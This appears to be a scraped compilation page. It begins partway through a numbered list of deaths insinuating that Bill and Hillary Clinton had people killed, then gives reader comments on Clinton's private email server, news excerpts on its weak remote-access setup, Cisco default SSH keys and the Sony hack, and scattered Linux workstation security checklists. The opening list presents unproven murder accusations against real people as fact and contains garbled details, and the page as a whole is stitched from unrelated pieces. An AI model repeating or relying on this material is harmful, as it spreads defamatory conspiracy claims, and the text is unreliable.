2 - Mary Mahoney - A former White House intern was murdered July 1997 at a Starbucks Coffee Shop in Georgetown (Washington, D. C.). The murder happened just after she was to go public with her story of sexual harassment by Clinton in the White House.

3 - Vince Foster - Former White House Councilor, and colleague of Hillary Clinton at Little Rock 's Rose Law Firm. Died of a gunshot wound to the head, ruled a suicide. (He was about to testify against Hillary related to the records she refused to turn over to congress.) Was reported to have been having an affair with Hillary.

4 - Ron Brown - Secretary of Commerce and former DNC Chairman. Reported to have died by impact in a plane crash. A pathologist close to the investigation reported that there was a hole in the top of Brown's skull resembling a gunshot wound. At the time of his death Brown was being investigated, and spoke publicly of his willingness to cut a deal with prosecutors. The rest of the people on the plane also died. A few days later the Air Traffic controller committed suicide.

5 - C. Victor Raiser, II - Raiser, a major player in the Clinton fund raising organization died in a private plane crash in July 1992.

6 - Paul Tulley - Democratic National Committee Political Director found dead in a hotel room in Little Rock on September 1992. Described by Clinton as a "dear friend and trusted advisor".

7 - Ed Willey - Clinton fundraiser, found dead November 1993 deep in the woods in VA of a gunshot wound to the head. Ruled a suicide. Ed Willey died on the same day His wife Kathleen Willey claimed Bill Clinton groped her in the oval office in the White House. Ed Willey was involved in several Clinton fund raising events.

8 - Jerry Parks - Head of Clinton's gubernatorial security team in Little Rock .. Gunned down in his car at a deserted intersection outside Little Rock . Park's son said his father was building a dossier on Clinton . He allegedly threatened to reveal this information. After he died the files were mysteriously removed from his house.

9 - James Bunch - Died from a gunshot suicide. It was reported that he had a "Black Book" of people which contained names of influential people who visited Prostitutes in Texas and Arkansas

10 - James Wilson - Was found dead in May 1993 from an apparent hanging suicide. He was reported to have ties to the Clintons ' Whitewater deals.

11 - Kathy Ferguson - Ex-wife of Arkansas Trooper Danny Ferguson , was found dead in May 1994, in her living room with a gunshot to her head. It was ruled a suicide even though there were several packed suitcases, as if she were going somewhere. Danny Ferguson was a co-defendant along with Bill Clinton in the Paula Jones Lawsuit, and Kathy Ferguson was a possible corroborating witness for Paula Jones.

12 - Bill Shelton - Arkansas State Trooper and fiancée of Kathy Ferguson. Critical of the suicide ruling of his fiancée, he was found dead in June, 1994 of a gunshot wound also ruled a suicide at the grave site of his fiancée.

13 - Gandy Baugh - Attorney for Clinton 's friend Dan Lassater, died by jumping out a window of a tall building January, 1994. His client, Dan Lassater, was a convicted drug distributor.

14 - Florence Martin - Accountant & sub-contractor for the CIA, was related to the Barry Seal, Mena , Arkansas Airport drug smuggling case. He died of three gunshot Wounds.

15 - Suzanne Coleman - Reportedly had an affair with Clinton when he was Arkansas Attorney General. Died Of a gunshot wound to the back of the head, ruled a Suicide. Was pregnant at the time of her death.

16 - Paula Grober - Clinton 's speech interpreter for the deaf from 1978 until her death December 9, 1992. She died in a one car accident.

17 - Danny Casolaro - Investigative reporter who was Investigating the Mean Airport and Arkansas Development Finance Authority. He slit his wrists, apparently, in the middle of his investigation.

18 - Paul Wilcher - Attorney investigating corruption at Mean Airport with Casolaro and the 1980 "October Surprise" was found dead on a toilet June 22, 1993, in his Washington DC apartment. Had delivered a report to Janet Reno 3 weeks before his death. (May have died of poison)

19 - Jon Parnell Walker - Whitewater investigator for Resolution Trust Corp. Jumped to his death from his Arlington , Virginia apartment balcony August 15,1993. He was investigating the Morgan Guaranty scandal.

Thijs Buelens -> honey1969 29 Jan 2016 18:41

Did the actors from Orange is the New Black already endorsed Hillary? Just wondering.

Sam3456 -> Sam3456 29 Jan 2016 18:35

Remember as soon as Snowden walked out the door with his USB drive full of secrets his was in violation. Wether he knew the severity and classification or not.

Think of Hillary's email server as her home USB drive.

RedPillCeryx 29 Jan 2016 18:33

Government civil and military employees working with material at the Top Secret level are required to undergo incredibly protracted and intrusive vetting procedures (including polygraph testing) in order to obtain and keep current their security clearances to access such matter. Was Hillary Clinton required to obtain a Top Secret clearance in the same way, or was she just waved through because of Who She Is?

Sam3456 29 Jan 2016 18:32

Just to be clear, Colin Powell used a private email ACCOUNT which was hosted in the cloud and used it only for personal use. He was audited (never deleted anything) and it was found to contain no government records.

Hillary used a server, which means in electronic form the documents existed outside the State Department unsecured. Its as if she took a Top Secret file home with her. That is a VERY BIG mistake and as the Sec of State she signed a document saying she understood the rules and agreed to play by them. She did not and removing state secrets from their secure location is a very serious matter. Wether you put the actual file in your briefcase or have them sitting in electronic version on your server.

Second, she signed a document saying she would return any and ALL documents and copies of documents pertaining to the State Department with 30 (or 60 I can't remember) of leaving. The documents on her server, again electronic copies of the top secret files, where not returned for 2 years. Thats a huge violation.

Finally, there is a clause in classification that deals with the information that is top secret by nature. Meaning regardless of wether its MARKED classified or not the very nature of the material would be apparent to a senior official that it was classified and appropriate action would have to be taken. She she either knew and ignored or did not know...and both of those scenarios don't give me a lot of confidence.

Finally the information that was classified at the highest levels means exposure of that material would put human operatives lives at risk. Something she accused Snowden of doing when she called him a traitor. By putting that information outside the State Department firewall she basically put peoples lives at risk so she could have the convenience of using one mobile device.


Wallabyfan -> MtnClimber 29 Jan 2016 18:10

Sorry you can delude yourself all you like but Powell and Cheney used private emails while at work on secure servers for personal communications not highly classified communications and did so before the 2009 ban on this practice came into place . Clinton has used a private unsecured server at her home while Sec of State and even worse provided access to people in her team who had no security clearance. She has also deleted more than 30,000 emails from the server in full knowledge of the FBI probe. You do realise that she is going to end up in jail don't you?

MtnClimber -> boscovee 29 Jan 2016 18:07

Are you as interested in all of the emails that Cheney destroyed? He was asked to provide them and never allowed ANY to be seen.

Typical GOP

Dozens die at embassies under Bush. Zero investigations. Zero hearings.
4 die at an embassy under Clinton. Dozens of hearings.

OurNigel -> Robert Greene 29 Jan 2016 17:53

Its not hard to understand, she was supposed to only use her official email account maintained on secure Federal government servers when conducting official business during her tenure as Secretary of State. This was for three reasons, the first being security the second being transparency and the third for accountability.

Serious breach of protocol I'm afraid.

Talgen -> Exceptionalism 29 Jan 2016 17:50

Department responses for classification infractions could include counseling, warnings or other action, officials said. They wouldn't say if Clinton or senior aides who've since left government could face penalties. The officials weren't authorized to speak on the matter and demanded anonymity."

You need to share that one with Petraeus, whos career was ruined and had to pay 100k in fines, for letting some info slip to his mistress..

Wallabyfan 29 Jan 2016 17:50

No one here seems to be able to accept how serious this is. You cant downplay it. This is the most serious scandal we have seen in American politics for decades.

Any other US official handling even 1 classified piece of material on his or her own unsecured home server would have been arrested and jailed by now for about 50 years perhaps longer. The fact that we are talking about 20 + (at least) indicates at the very least Clinton's hubris, incompetence and very poor judgement as well as being a very serious breach of US law. Her campaign is doomed.

This is only the beginning of the scandal and I predict we will be rocked when we learn the truth. Clinton will be indicted and probably jailed along with Huma Abedin who the FBI are also investigating.


HiramsMaxim -> Exceptionalism 29 Jan 2016 17:50

http://freebeacon.com/wp-content/uploads/2015/11/HRC-SCI-NDA1.pdf


OurNigel 29 Jan 2016 17:42

This is supposed to be the lady who (in her own words) has a huge experience of government yet she willingly broke not just State Department protocols and procedures, by using a privately maintained none secure server for her email service she also broke Federal laws and regulations governing recordkeeping requirements.

At the very least this was a massive breach of security and a total disregard for established rules whilst she was in office. Its not as if she was just some local government officer in a backwater town she was Secretary of State for the United States government.

If the NSA is to be believed you should presume her emails could have been read by any foreign state.

This is actually a huge story.


TassieNigel 29 Jan 2016 17:41

This god awful Clinton family had to be stopped somehow I suppose. Now if I'd done it, I'd be behind bars long ago, so when will Hillary be charged is my question ?

Hillary made much of slinging off about the "traitor" Julian Assange, so let's see how Mrs Clinton looks like behind bars. A woman simply incapable of telling the truth !

Celebrations for Bernie Sanders of course.


HiramsMaxim 29 Jan 2016 17:41

They also wouldn't disclose whether any of the documents reflected information that was classified at the time of transmission,

Has nothing to do with anything. Maybe the author should read the actual NDA signed by Mrs. Clinton.

http://freebeacon.com/wp-content/uploads/2015/11/HRC-SCI-NDA1.pdf


beneboy303 -> dusablon 29 Jan 2016 17:18

If every corrupt liar was sent to prison there'd be no one left in Washington, or Westminster and we'd have to have elections with ordinary people standing, instead of the usual suspects from the political class. Which, on reflection, sounds quite good !


In_for_the_kill 29 Jan 2016 17:15

Come on Guardian, this should be your lead story, the executive branch of the United States just confirmed that a candidate for the Presidency pretty much broke the law, knowingly. If that ain't headline material, then I don't know what is.


dusablon -> SenseCir 29 Jan 2016 17:09

Irrelevant?

Knowingly committing a felony by a candidate for POTUS is anything but irrelevant.

And forget her oh-so-clever excuses about not sending or receiving anything marked top secret or any other level of classification including SAP. If you work programs like those you know that anything generated related to that program is automatically classified, whether or not it's marked as such. And such material is only shared on a need to know basis.

She's putting out a smokescreen to fool the majority of voters who have never or will never have special access. She is a criminal and needs to be arrested. Period.

Commentator6 29 Jan 2016 17:00

It's a reckless arrogance combined with the belief that no-one can touch her. If she does become the nominee Hillary will be an easy target for Trump. It'll be like "shooting fish in a barrel".

DismayedPerplexed -> OnlyOneView 29 Jan 2016 16:40

Are you forgetting W and his administration's 5 million deleted emails?

http://www.salon.com/2015/03/12/the_george_w_bush_email_scandal_the_media_has_conveniently_forgotten_partner/

Bob Sheerin 29 Jan 2016 16:40

Consider that email is an indispensable tool in doing one's job. Consider that in order to effectively do her job, candidate Clinton -- as the Secretary of State -- had to be sending and receiving Top Secret documents. Consider that all of her email was routed through a personal server. Consider whether she released all of the relevant emails. Well, she claimed she did but the evidence contradicts such a claim. Consider that this latest news release has -- like so many others -- been released late on a Friday.

It is obvious that the Secretary of State and the President should be communicating on a secure network controlled by the federal government. It is obvious that virtually none of these communications were done in a secure manner. Consider whether someone who contends this is irrelevant has enough sense to come in out of the rain.

[Oct 14, 2015] Security farce at Datto Inc that held Hillary Clintons emails revealed

Notable quotes:
"... But its building in Bern Township, Pennsylvania, doesn't have a perimeter fence or security checkpoints and has two reception areas ..."
"... Dumpsters at the site were left open and unguarded, and loading bays have no security presence ..."
"... It has also been reported that hackers tried to gain access to her personal email address by sending her emails disguised parking violations which were designed to gain access to her computer. ..."
"... a former senior executive at Datto was allegedly able to steal sensitive information from the company's systems after she was fired. ..."
Oct 13, 2015 | Daily Mail Online

Datto Inc has been revealed to have stored Hillary Clinton's emails - which contained national secrets - when it backed up her private server

The congressional committee is focusing on what happened to the server after she left office in a controversy that is dogging her presidential run and harming her trust with voters.

In the latest developments it emerged that hackers in China, South Korea and Germany tried to gain access to the server after she left office. It has also been reported that hackers tried to gain access to her personal email address by sending her emails disguised parking violations which were designed to gain access to her computer.

Daily Mail Online has previously revealed how a former senior executive at Datto was allegedly able to steal sensitive information from the company's systems after she was fired.

Hackers also managed to completely take over a Datto storage device, allowing them to steal whatever data they wanted.

Employees at the company, which is based in Norwalk, Connecticut, have a maverick attitude and see themselves as 'disrupters' of a staid industry.

On their Facebook page they have posed for pictures wearing ugly sweaters and in fancy dress including stereotypes of Mexicans.

Its founder, Austin McChord, has been called the 'Steve Jobs' of data storage and who likes to play in his offices with Nerf guns and crazy costumes.

Nobody from Datto was available for comment.

itpol-linux-workstation-security.md at master · lfit-itpol · GitHub

SecureBoot

Despite its controversial nature, SecureBoot offers prevention against many attacks targeting workstations (Rootkits, "Evil Maid," etc), without introducing too much extra hassle. It will not stop a truly dedicated attacker, plus there is a pretty high degree of certainty that state security agencies have ways to defeat it (probably by design), but having SecureBoot is better than having nothing at all.

Alternatively, you may set up Anti Evil Maid which offers a more wholesome protection against the type of attacks that SecureBoot is supposed to prevent, but it will require more effort to set up and maintain.

Avoid Firewire, thunderbolt, and ExpressCard ports

Firewire is a standard that, by design, allows any connecting device full direct memory access to your system (see Wikipedia). Thunderbolt and ExpressCard are guilty of the same, though some later implementations of Thunderbolt attempt to limit the scope of memory access. It is best if the system you are getting has none of these ports, but it is not critical, as they usually can be turned off via UEFI or disabled in the kernel itself.

TPM Chip

Trusted Platform Module (TPM) is a crypto chip bundled with the motherboard separately from the core processor, which can be used for additional platform security (such as to store full-disk encryption keys), but is not normally used for day-to-day workstation operation. At best, this is a nice-to-have, unless you have a specific need to use TPM for your workstation security.

Checklist

  • Has a robust MAC/RBAC implementation (SELinux/AppArmor/GrSecurity) (ESSENTIAL)
  • Publishes security bulletins (ESSENTIAL)
  • Provides timely security patches (ESSENTIAL)
  • Provides cryptographic verification of packages (ESSENTIAL)
  • Fully supports UEFI and SecureBoot (ESSENTIAL)
  • Has robust native full disk encryption support (ESSENTIAL)

[Oct 13, 2015] Hillary Clintons private server was open to low-skilled-hackers

Notable quotes:
"... " That's total amateur hour. Real enterprise-class security, with teams dedicated to these things, would not do this" -- ..."
"... The government and security firms have published warnings about allowing this kind of remote access to Clinton's server. The same software was targeted by an infectious Internet worm, known as Morta, which exploited weak passwords to break into servers. The software also was known to be vulnerable to brute-force attacks that tried password combinations until hackers broke in, and in some cases it could be tricked into revealing sensitive details about a server to help hackers formulate attacks. ..."
"... Also in 2012, the State Department had outlawed use of remote-access software for its technology officials to maintain unclassified servers without a waiver. It had banned all instances of remotely connecting to classified servers or servers located overseas. ..."
"... The findings suggest Clinton's server 'violates the most basic network-perimeter security tenets: Don't expose insecure services to the Internet,' said Justin Harvey, the chief security officer for Fidelis Cybersecurity. ..."
"... The U.S. National Institute of Standards and Technology, the federal government's guiding agency on computer technology, warned in 2008 that exposed server ports were security risks. It said remote-control programs should only be used in conjunction with encryption tunnels, such as secure VPN connections. ..."
Daily Mail Online

Investigation by the Associated Press reveals that the clintonemail.com server lacked basic protections

  • Microsoft remote desktop service she used was not intended for use without additional safety features - but had none
  • Government and computer industry had warned at the time that such set-ups could be hacked - but nothing was done to make server safer
  • President this weekend denied national security had been put at risk by his secretary of state but FBI probe is still under way

... ... ...

Clinton's server, which handled her personal and State Department correspondence, appeared to allow users to connect openly over the Internet to control it remotely, according to detailed records compiled in 2012.

Experts said the Microsoft remote desktop service wasn't intended for such use without additional protective measures, and was the subject of U.S. government and industry warnings at the time over attacks from even low-skilled intruders.

.... ... ...

Records show that Clinton additionally operated two more devices on her home network in Chappaqua, New York, that also were directly accessible from the Internet.

" That's total amateur hour. Real enterprise-class security, with teams dedicated to these things, would not do this" -- Marc Maiffret, cyber security expert

  • One contained similar remote-control software that also has suffered from security vulnerabilities, known as Virtual Network Computing, and the other appeared to be configured to run websites.
  • The new details provide the first clues about how Clinton's computer, running Microsoft's server software, was set up and protected when she used it exclusively over four years as secretary of state for all work messages.
  • Clinton's privately paid technology adviser, Bryan Pagliano, has declined to answer questions about his work from congressional investigators, citing the U.S. Constitution's Fifth Amendment protection against self-incrimination.
  • Some emails on Clinton's server were later deemed top secret, and scores of others included confidential or sensitive information.
  • Clinton has said that her server featured 'numerous safeguards,' but she has yet to explain how well her system was secured and whether, or how frequently, security updates were applied.

'That's total amateur hour,' said Marc Maiffret, who has founded two cyber security companies. He said permitting remote-access connections directly over the Internet would be the result of someone choosing convenience over security or failing to understand the risks. 'Real enterprise-class security, with teams dedicated to these things, would not do this,' he said.

The government and security firms have published warnings about allowing this kind of remote access to Clinton's server. The same software was targeted by an infectious Internet worm, known as Morta, which exploited weak passwords to break into servers. The software also was known to be vulnerable to brute-force attacks that tried password combinations until hackers broke in, and in some cases it could be tricked into revealing sensitive details about a server to help hackers formulate attacks.

'An attacker with a low skill level would be able to exploit this vulnerability,' said the Homeland Security Department's U.S. Computer Emergency Readiness Team in 2012, the same year Clinton's server was scanned.

Also in 2012, the State Department had outlawed use of remote-access software for its technology officials to maintain unclassified servers without a waiver. It had banned all instances of remotely connecting to classified servers or servers located overseas.

The findings suggest Clinton's server 'violates the most basic network-perimeter security tenets: Don't expose insecure services to the Internet,' said Justin Harvey, the chief security officer for Fidelis Cybersecurity.

Clinton's email server at one point also was operating software necessary to publish websites, although it was not believed to have been used for this purpose.

Traditional security practices dictate shutting off all a server's unnecessary functions to prevent hackers from exploiting design flaws in them.

In Clinton's case, Internet addresses the AP traced to her home in Chappaqua revealed open ports on three devices, including her email system.

Each numbered port is commonly, but not always uniquely, associated with specific features or functions. The AP in March was first to discover Clinton's use of a private email server and trace it to her home.

Mikko Hypponen, the chief research officer at F-Secure, a top global computer security firm, said it was unclear how Clinton's server was configured, but an out-of-the-box installation of remote desktop would have been vulnerable.

Those risks - such as giving hackers a chance to run malicious software on her machine - were 'clearly serious' and could have allowed snoops to deploy so-called 'back doors.'

The U.S. National Institute of Standards and Technology, the federal government's guiding agency on computer technology, warned in 2008 that exposed server ports were security risks.

It said remote-control programs should only be used in conjunction with encryption tunnels, such as secure VPN connections.

Personal workstation backups

Workstation backups tend to be overlooked or done in a haphazard, often unsafe manner.

Checklist

  • Set up encrypted workstation backups to external storage (ESSENTIAL)
  • Use zero-knowledge backup tools for off-site/cloud backups (NICE)
Firefox for work and high security sites

Use Firefox to access work-related sites, where extra care should be taken to ensure that data like cookies, sessions, login information, keystrokes, etc, should most definitely not fall into attackers' hands. You should NOT use this browser for accessing any other sites except select few.

You should install the following Firefox add-ons:

  • NoScript (ESSENTIAL)
    • NoScript prevents active content from loading, except from user whitelisted domains. It is a great hassle to use with your default browser (though offers really good security benefits), so we recommend only enabling it on the browser you use to access work-related sites.
  • Privacy Badger (ESSENTIAL)
    • EFF's Privacy Badger will prevent most external trackers and ad platforms from being loaded, which will help avoid compromises on these tracking sites from affecting your browser (trackers and ad sites are very commonly targeted by attackers, as they allow rapid infection of thousands of systems worldwide).
  • HTTPS Everywhere (ESSENTIAL)
    • This EFF-developed Add-on will ensure that most of your sites are accessed over a secure connection, even if a link you click is using http:// (great to avoid a number of attacks, such as SSL-strip).
  • Certificate Patrol (NICE)
    • This tool will alert you if the site you're accessing has recently changed their TLS certificates -- especially if it wasn't nearing expiration dates or if it is now using a different certification authority. It helps alert you if someone is trying to man-in-the-middle your connection, but generates a lot of benign false-positives.

You should leave Firefox as your default browser for opening links, as NoScript will prevent most active content from loading or executing.

Chrome/Chromium for everything else

Chromium developers are ahead of Firefox in adding a lot of nice security features (at least on Linux), such as seccomp sandboxes, kernel user namespaces, etc, which act as an added layer of isolation between the sites you visit and the rest of your system. Chromium is the upstream open-source project, and Chrome is Google's proprietary binary build based on it (insert the usual paranoid caution about not using it for anything you don't want Google to know about).

It is recommended that you install Privacy Badger and HTTPS Everywhere extensions in Chrome as well and give it a distinct theme from Firefox to indicate that this is your "untrusted sites" browser.

2: Use two different browsers, one inside a dedicated VM (NICE)

This is a similar recommendation to the above, except you will add an extra step of running the "everything else" browser inside a dedicated VM that you access via a fast protocol, allowing you to share clipboards and forward sound events (e.g. Spice or RDP). This will add an excellent layer of isolation between the untrusted browser and the rest of your work environment, ensuring that attackers who manage to fully compromise your browser will then have to additionally break out of the VM isolation layer in order to get to the rest of your system.

This is a surprisingly workable configuration, but requires a lot of RAM and fast processors that can handle the increased load. It will also require an important amount of dedication on the part of the admin who will need to adjust their work practices accordingly.

3: Fully separate your work and play environments via virtualization (PARANOID)

See Qubes-OS project, which strives to provide a high-security workstation environment via compartmentalizing your applications into separate fully isolated VMs.

Password managers

Checklist

  • Use a password manager (ESSENTIAL)
  • Use unique passwords on unrelated sites (ESSENTIAL)
  • Use a password manager that supports team sharing (NICE)
  • Use a separate password manager for non-website accounts (NICE)

Securing SSH and PGP private keys

Personal encryption keys, including SSH and PGP private keys, are going to be the most prized items on your workstation -- something the attackers will be most interested in obtaining, as that would allow them to further attack your infrastructure or impersonate you to other admins. You should take extra steps to ensure that your private keys are well protected against theft.

Checklist

  • Strong passphrases are used to protect private keys (ESSENTIAL)
  • PGP Master key is stored on removable storage (NICE)
  • Auth, Sign and Encrypt Subkeys are stored on a smartcard device (NICE)
  • SSH is configured to use PGP Auth key as ssh private key (NICE)

Hibernate or shut down, do not suspend

When a system is suspended, the RAM contents are kept on the memory chips and can be read by an attacker (known as the Cold Boot Attack). If you are going away from your system for an extended period of time, such as at the end of the day, it is best to shut it down or hibernate it instead of suspending it or leaving it on.

[Dec 07, 2015]  10 Highlights of Jon Corbet's Linux Kernel Report

"... The kernel has roughly 19 million lines of code, and over 3 million lines haven't been touched in 10  years. The problem with old, unmaintained code is that it tends to harbor some really old bugs. "We have millions of systems out there running Linux and milions of people relying on security of a system on which the Linux kernel is the base," Corbet said. "If we're not going to let those people down, we need to be more serious about security."
 ..."In his keynote talk at Collaboration Summit, kernel contributor and LWN Editor Jon Corbet elaborated on the results of the Who Writes Linux report, released today, and gave more insights on where kernel development is headed over the next year, its challenges, and successes. Here are 10 highlights (watch the full video, below):

1. 3.15 was the biggest kernel release ever with 13,722 patches merged. "I imagine we will surpass that again," Corbet said. "The amount of changes to the kernel is just going up over time."

2. The number of developers participating is going up over time while the amount of time it takes us to create a kernel is actually dropping over time. It started at 80 days between kernel releases some time ago, and it's now down to about 63 days. "I don't know how much shorter we can get," he said.

3. Developers added seven new system calls to the kernel over the past year, along with new features such as deadline scheduling, control group reworking, multiqueue block layer, and lots of networking improvmenets. That's in addition to hundreds of new hardware drivers and thousands of bug fixes.

4. Testing is a real challenge for the kernel. Developers are doing better at finding bugs before they affect users or open a security hole. Improved integration testing during the merge window, using the zero day build bot to find problems before they get into the mainline kernel, and new free and proprietary testing tools have improved kernel testing. But there is still room for improvement.

5. Corbet's own analysis found 115 kernel CVE's in 2014, or a vulnerability every three days.

6. The kernel has roughly 19 million lines of code, and over 3 million lines haven't been touched in 10  years. The problem with old, unmaintained code is that it tends to harbor some really old bugs. "We have millions of systems out there running Linux and milions of people relying on security of a system on which the Linux kernel is the base," Corbet said. "If we're not going to let those people down, we need to be more serious about security."

7. The year 2038 problem - the year the t value runs out of bits in the kernel's existing time format - needs to be fixed sooner rather than later. The core timekeeping code of the kernel was fixed in 2014 – the other layers of the kernel will take more work.

8. The Linux kernel is getting bigger with each version and currently uses 1 MB of memory. That's too big to support devices built for the Internet of Things. The kernel tinification effort is re-thinking the traditional Linux kernel, for example getting rid of the concept of users and groups in the kernel, but it faces some resistance. "We can't just count on the dominance of Linux in this area unless we earn it" by addressing the needs of much smaller systems, Corbet said.

9. Live kernel patching is coming to the mainline kernel this year.

10. The kdbus subsystem development - an addition coming in 2015 that will help make distributed computing more secure - has been a model of how kernel development should work.

 

[Oct 14, 2015] Security farce at Datto Inc that held Hillary Clinton's emails revealed

[Jun 27, 2015]  Cisco Security Appliances Found To Have Default SSH Keys

Jun 27, 2015  |  Slashdot
June 26, 2015 | Soulskill 
Trailrunner7 writes: Many Cisco security appliances contain default, authorized SSH keys that can allow an attacker to connect to an appliance and take almost any action he chooses. The company said all of its Web Security Virtual Appliances, Email Security Virtual Appliances, and Content Security Management Virtual Appliances are affected by the vulnerability.

This bug is about as serious as they come for enterprises. An attacker who is able to discover the default SSH key would have virtually free reign on vulnerable boxes, which, given Cisco's market share and presence in the enterprise worldwide, is likely a high number. The default key apparently was inserted into the software for support reasons.

"The vulnerability is due to the presence of a default authorized SSH key that is shared across all the installations of WSAv, ESAv, and SMAv. An attacker could exploit this vulnerability by obtaining the SSH private key and using it to connect to any WSAv, ESAv, or SMAv. An exploit could allow the attacker to access the system with the privileges of the root user," Cisco said.

[Jun 02, 2015]  Sony Hack Clooney Says Movie is about Snowden, Not Journalism

Dec 22, 2014 | The Intercept

A draft of the release was sent to a senior executive in Sony’s Government Affairs office, Keith Weaver, who offered a few “concerns/edits” before they were sent to Greenwald. Weaver was concerned about how Sony described U.S. government spying. Weaver wrote:

1. In the first sentence of the second paragraph – delete the phrase “illegal spying” and either it [sic] simply as “operations” or replace it with “intelligence gathering” — so the clause would read “U.S. government’s intelligence gathering operations.”

2. In the second sentence of the second paragraph — delete the “phrase misuse of power” and replace it with “actions” or “activities” so that it would read “The NSA’s actions” or “the NSA’S activities.”

Weaver was also concerned about how the draft quoted Greenwald as saying, “Growing up, I was heavily influenced by political films, and am excited about the opportunity to be a part of a political film that will resonate with today’s moviegoers.” Weaver, who would go on to be a key figure in the damage control team on Sony’s The Interview, wondered in the same email whether Sony wanted Greenwald to describe it as a “political film.”

“That’s really more of PR point so up to you guys — and I suspect since it is his own quote Greeenwald will feel strongly,” the Sony executive wrote.

The final version of the press release took Weaver’s suggestions on toning down the language on NSA, but let Greenwald’s quote stand (Greenwald, when asked about the emails, says he was “unaware, but am not surprised, that an internal Sony lobbyist diluted the press release draft in order to avoid upsetting the government.”)

[Dec 07, 2015]  Google Hit Again by Unauthorized SSL-TLS Certificates

eSecurity Planet

The SSL/TLS certificate authority system's frailty is again exposed, as an unauthorized certificate is issued for Google.

The purpose of an SSL/TLS digital certificate is to provide a degree of authenticity and integrity to an encrypted connection. The SSL/TLS certificate helps users positively identify sites, but what happens when a certificate is wrongly issued? Just ask Google, which has more experience than most in dealing with this issue.

On March 23 Google reported that unauthorized certificates for Google domains were issued by MCS Holdings, which is an intermediate certificate authority under CNNIC. Because CNNIC is a trusted CA that is included in every major Web browser, the certificate might have been trusted by default, even though it wasn't legitimate.

Google, thanks to its own past experience, leverages HTTP public key pinning (HPKP) in Chrome and Firefox. With HPKP, sites can "pin" certificates that they will allow. As such, fraudulent certificates not pinned by Google would not be accepted as authentic.

Browsers that don't support HPKP in the same way, including Apple Safari and Microsoft Internet Explorer, might have been potentially tricked by the fraudulent certificates, however.

 

[Dec 27, 2014]  FBI warned Year Ago of impending Malware Attacks—But Didn’t Share Info with Sony

Multiple sources familiar with the report and FBI channels for distribution said only if members of their IT department were members of the voluntary organization Infragard, which also received the report, would they have even seen it at all.
https://firstlook.org/theintercept/2014/12/24/fbi-warning/

Nearly one year before Sony was hacked, the FBI warned that U.S. companies were facing potentially crippling data destruction malware attacks, and predicted that such a hack could cause irreparable harm to a firm’s reputation, or even spell the end of the company entirely.  The FBI also detailed specific guidance for U.S. companies to follow to prepare and plan for such an attack.

But the FBI never sent Sony the report.

The Dec. 13, 2013 FBI Intelligence Assessment, “Potential Impacts of a Data-Destruction Malware Attack on a U.S. Critical Infrastructure Company’s Network,” warned that companies “must become prepared for the increasing possibility they could become victim to a data destruction cyber attack.”

The 16-page report includes details on previous malware attacks on South Korea banking and media companies—the same incidents and characteristics the FBI said Dec. 19th that it had used to conclude that North Korea was behind the Sony attack.

The report, a copy of which was obtained by The Intercept, was based on discussions with private industry representatives and was prepared after the 2012 cyber attack on Saudi Aramco.  The report was marked For Official Use Only, and has not been previously released.

In it, the FBI warned, “In the current cyber climate, the FBI speculates it is not a question of if a U.S. company will experience an attempted data-destruction attack, but when and which company will fall victim.”

The detailed warning raises new questions about how prepared Sony should have been for the December hack, which resulted in terabytes of commercial and personal data being stolen or released on the internet, including sensitive company emails and employee medical and personal data. Multiple sources told The Intercept that the December 2013 report raises new questions about what Sony—which is considered by the U.S. government as part of “critical infrastructure”—did or did not do to secure its systems in the year before the cyber attack.

Earlier this month, the FBI formally accused North Korea of being behind the Sony hack. “Technical analysis of the data deletion malware used in this attack revealed links to other malware that the FBI knows North Korean actors previously developed,“ the Dec. 19th FBI press release said. “For example, there were similarities in specific lines of code, encryption algorithms, data deletion methods, and compromised networks.”

The FBI also recently referred to specific evidence they say led them to determine North Korea’s involvement, including the use of the same infrastructure, IP addresses, and similarities between the Sony attack and last year’s attack against South Korean businesses and media.

North Korea has repeatedly denied involvement in the Sony cyber attack.

The FBI warning from December 2013 focuses on the same type of data destruction malware attack that Sony fell victim to nearly a year later.  The report questions whether industry was overly optimistic about recovering from such an attack and notes that some companies “wondered whether [a malware attack] could have a more significant destructive impact: the failure of the company.”

In fact, the 2013 report contains a nearly identical description of the attacks detailed in the recent FBI release. “The malware used deleted just enough data to make the machines unusable; the malware was specifically written for Korean targets, and checked for Korean antivirus products to disable,” the Dec. 2013 report said. “The malware attack on South Korean companies defaced the machine with a message from the ‘WhoIs Team.’”

Sony did not respond to The Intercept’s questions about whether they had received the report, but the FBI  confirmed that Sony was not on the distribution list. “The FBI did not provide it directly to them,” FBI spokesman Paul Bresson told The Intercept. “It was provided to several of our outreach components for dissemination as appropriate.”

Multiple sources familiar with the report and FBI channels for distribution said only if members of their IT department were members of the voluntary organization Infragard, which also received the report, would they have even seen it at all.

The report obtained by The Intercept includes pages of check-lists and step-by step guidance for U.S. companies on how to prepare for, mitigate and recover from the same exact type of hack that hit Sony.  Those sorts of “best practices” are critical for companies trying to fend off cases like the Sony attack, Kurt Baumgartner, Principal Security Researcher at Kaspersky Lab, told The Intercept.

Sony was “not adequately following best practices for a company of its size and sector,” Baumgartner said. “The most obvious, had they followed netflow monitoring recommendations, they would have noticed the outbound exfiltration of terabytes of data.”

Had Sony gotten the FBI report, they also would have received specific guidance prepared by the Department of Homeland Security Industrial Control Systems Cyber Emergency Response Team for preparation and planning for a successful destructive malware attack.  Sources familiar with the 2013 report believe if Sony had followed these guidelines the effects of the cyber attack would have been far less severe.

The real question, then, is whether more could have been done to prevent the Sony hack, and if so, what. “Korean data was available since then—nobody really paid any attention to it,” a source within the information security industry told The Intercept. “

“The question is, who dropped the ball?” the source said. “Was the information in this report not shared or was information ignored?”

Photo: Nick Ut/AP

[Dec 26, 2014]  Did North Korea Really Attack Sony? 

An anonymous reader writes "Many security experts remain skeptical of North Korea's involvement in the recent Sony hacks. Schneier writes: "Clues in the hackers' attack code seem to point in all directions at once. The FBI points to reused code from previous attacks associated with North Korea, as well as similarities in the networks used to launch the attacks. Korean language in the code also suggests a Korean origin, though not necessarily a North Korean one, since North Koreans use a unique dialect. However you read it, this sort of evidence is circumstantial at best. It's easy to fake, and it's even easier to interpret it incorrectly. In general, it's a situation that rapidly devolves into storytelling, where analysts pick bits and pieces of the "evidence" to suit the narrative they already have worked out in their heads.""

BitterOak (537666) on Wednesday December 24, 2014 @06:21PM (#48670061)

I was suspicious from the moment they denied it. (Score:5, Insightful)

I was suspicious of the U.S. allegations that the North Korean government was behind it when the North Koreans denied it was them. If you're going to hack somebody to make a political statement, it makes no sense to later deny that you were involved. Someone might be trying to make it look like North Korea, but I seriously doubt they were directly involved in this.

Rei (128717) on Wednesday December 24, 2014 @06:24PM (#48670077) Homepage

Right. (Score:3)

